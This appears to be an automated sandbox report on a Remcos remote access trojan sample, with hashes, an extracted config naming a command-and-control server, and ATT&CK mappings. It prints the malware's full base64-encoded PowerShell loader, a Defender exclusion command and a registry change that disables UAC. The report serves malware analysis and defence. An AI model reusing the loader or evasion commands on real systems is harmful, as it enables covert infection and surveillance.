remcos | 230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f

Analysis

max time kernel
148s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
16-05-2024 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe
Size

1.3MB
MD5

a8e4c5bfdec6d09b86b1a522c2348367
SHA1

3a13ff10d314c01d9a5ecb766274757dcc508c2b
SHA256

230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f
SHA512

02a663a444240847b2efc796bf2ead272c8b6d9dd678e01b9026fd42dcaad37bbc9cac2d3eb26590d66919ac0b0c10e66f27f5074ebac8c88c7709ca701620f1
SSDEEP

24576:TxB9gs/l97fTp+hmFVrWHGc6H+pvxoOXk81pRNHBoKkoR:/L7bwwBH+1xFXkwpRJZ9R

Score

10^/10

remcos remotehost evasion execution rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KDW6BI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3100	powershell.exe
3924	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3100 set thread context of 748	3100	powershell.exe	85

Runs regedit.exe 1 IoCs

pid	Process
3628	regedit.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3924	powershell.exe
3924	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
748	iexplore.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 4548 wrote to memory of 3100	4548	230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe	79
PID 4548 wrote to memory of 3100	4548	230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe	79
PID 3100 wrote to memory of 3924	3100	powershell.exe	82
PID 3100 wrote to memory of 3924	3100	powershell.exe	82
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 3628	3100	powershell.exe	84
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 748	3100	powershell.exe	85
PID 3100 wrote to memory of 1328	3100	powershell.exe	86
PID 3100 wrote to memory of 1328	3100	powershell.exe	86
PID 3100 wrote to memory of 1328	3100	powershell.exe	86

C:\Users\Admin\AppData\Local\Temp\230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe
"C:\Users\Admin\AppData\Local\Temp\230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEQALAAgADAAeAA4ADMALAAgADAAeABFADQALAAgADAAeABDAEEALAAgADAAeABDADAALAAgADAAeAA4AEYALAAgADAAeAA5AEEALAAgADAAeABBADYALAAgADAAeAAzAEIALAAgADAAeAAzAEEALAAgADAAeAA1AEEALAAgADAAeAAzAEQALAAgADAAeAA4ADUALAAgADAAeAA5ADcALAAgADAAeABDADkALAAgADAAeAA3ADEALAAgADAAeAAxADAALAAgADAAeAAwADcALAAgADAAeAAwADcALAAgADAAeAA5AEMALAAgADAAeAA2ADYALAAgADAAeABGAEEALAAgADAAeAA2ADMALAAgADAAeAAzAEIALAAgADAAeABGAEYALAAgADAAeABFAEEALAAgADAAeAA4ADUALAAgADAAeABBAEQALAAgADAAeAA3AEUALAAgADAAeABBAEYALAAgADAAeABBAEUALAAgADAAeAA0AEEAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADkAMQAsACAAMAB4AEYAMgAsACAAMAB4AEEAOQAsACAAMAB4ADUARAAsACAAMAB4ADYAOAAsACAAMAB4AEMARAAsACAAMAB4ADEANwAsACAAMAB4AEYAOQAsACAAMAB4ADYAQwAsACAAMAB4AEMAOQAsACAAMAB4ADgANQAsACAAMAB4ADUAMQAsACAAMAB4ADcANwAsACAAMAB4ADcAQQAsACAAMAB4ADgAMAAsACAAMAB4AEMANAApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - UAC bypass
  - Windows security bypass
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\230d403e4d6b1f4e3a7c2e1a7fc33d0f9d34984d782cb3ffee1a3621d260609f.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3924
- - C:\Windows\regedit.exe
    "C:\Windows\regedit.exe"
    3⤵
    - Runs regedit.exe
    PID:3628
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:748
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    PID:1328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
184B

MD5
a7c4fb9c675a18d8830013ce53e4edfc

SHA1
bd4dffd1a14753a9a2f2203209eac5777e0276bb

SHA256
d28b9c6803c40e4cdff174a3d3e49031bba7b4434034bf0ac571c622e8343532

SHA512
a2bb4f6cecd4ba56fe47df9c86bfb1af170a72dba5b3a4c37484c0fda1dda79ceb0d102b0c1d0b423757a2864e55aad3a72b3fd614277a2a94d3a16558692298

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xewzvpn1.wok.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-3612.putik

Filesize
20KB

MD5
83b922683a3f569c7d876c1995b76814

SHA1
08c1c1e157f35b184825c2fec4a7f5610fe4b2d9

SHA256
43847b96cb4b7f4628a4c1facea0d483f26c55ded59e22a6381693cc71c8614d

SHA512
5e32d09ae7a5e0e1c8baffff4b2fe3957af44be1b88248aba4e031701a4270754cd98a0a304e32fcc832ea1aef4eaf8f8d0c0902e64afa6c730c248f3ff28316

Download Submit
memory/748-29-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3100-12-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3100-13-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3100-1-0x00007FFF1DEB3000-0x00007FFF1DEB5000-memory.dmp

Filesize
8KB

Download
memory/3100-15-0x0000025263570000-0x000002526357A000-memory.dmp

Filesize
40KB

Download
memory/3100-16-0x00000252635A0000-0x0000025263672000-memory.dmp

Filesize
840KB

Download
memory/3100-11-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3100-33-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3100-7-0x00000252632D0000-0x00000252632F2000-memory.dmp

Filesize
136KB

Download
memory/3924-25-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3924-26-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3924-27-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3924-28-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download
memory/3924-32-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

Filesize
10.8MB

Download